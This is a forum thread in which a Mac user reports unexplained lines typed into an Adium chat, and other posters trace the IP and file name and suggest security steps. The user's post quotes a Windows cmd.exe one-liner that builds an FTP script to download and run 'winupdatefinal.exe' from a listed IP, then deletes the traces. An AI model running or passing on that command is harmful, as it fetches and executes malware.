so earlier this morning I was watching tv while my macbook pro was up and running in my bedroom. When I got back to it a classmate was messaging me through Adium, and for my surprise I WAS AUTOMATICALLY ANSWERING him. Well, not quite answering but there were 3 lines "I wrote" to him, they were as follows:

%systemroot%çsystem32çcmd.exe

del eq/echo open 201.75.69.44 6992 :: eq/echo user 9894 4767 :: eq /echo get winupdatefinal.exe :: eq /echo quit :: eq /ftp 'n 'sÑeq /winupdatefinal.exe /del eq

j

for your consideration, my active sharing services were:
screen sharing
file sharing
web sharing
ssh
bluetooth sharing

also I have noticed that since yesterday spotlight has gone insane indexing my hard drives, but I hardly think it's related to this "attack".

question is: am I in danger?
i'd appreciate some clues on what's going on with my mac.
thanks in advance,

I think it's safe to say that this is the result of someone gaining access to your system, either via screen sharing, or ichat. Are you on a wireless network? What's your encryption? If it's WPA2, great, but are you allowing guest access and is your password more than 10 characters?

I would immediatley disconnect from whatever network you're on, turn airport OFF, and run disk utility from finder/applications/utilities/disk utility...choosing Macintosh HD from left column, then click repair disk.
After that, i would delete all preferred networks, and change your network access information from either airport utility if you have an apple router, or from your router's software if it's 3rd party!

This is not something i have ever seen happen as a result of the OS itself acting up. Sorry and good luck!

sounds like a s/breach, have you checked the IP against WHOIS : Whois record for 201.75.69.44 - its an IP in Brazil. The port it is using is used by many P2P apps such as LIMEWIRE.

When searching Google for the EXE you mentioned: it IS LINKED TO A VIRUS:

winupdate.exe problem - Viruses, Spyware and other Nasties

you can normally tell if a virus is present it will masquerade as a normal file.

__________________
I Do Not Condone Piracy, If You Like It BUY IT! - It's Ok To Test But Not Steal - MacBook Pro Owner

iPhone Owner 3G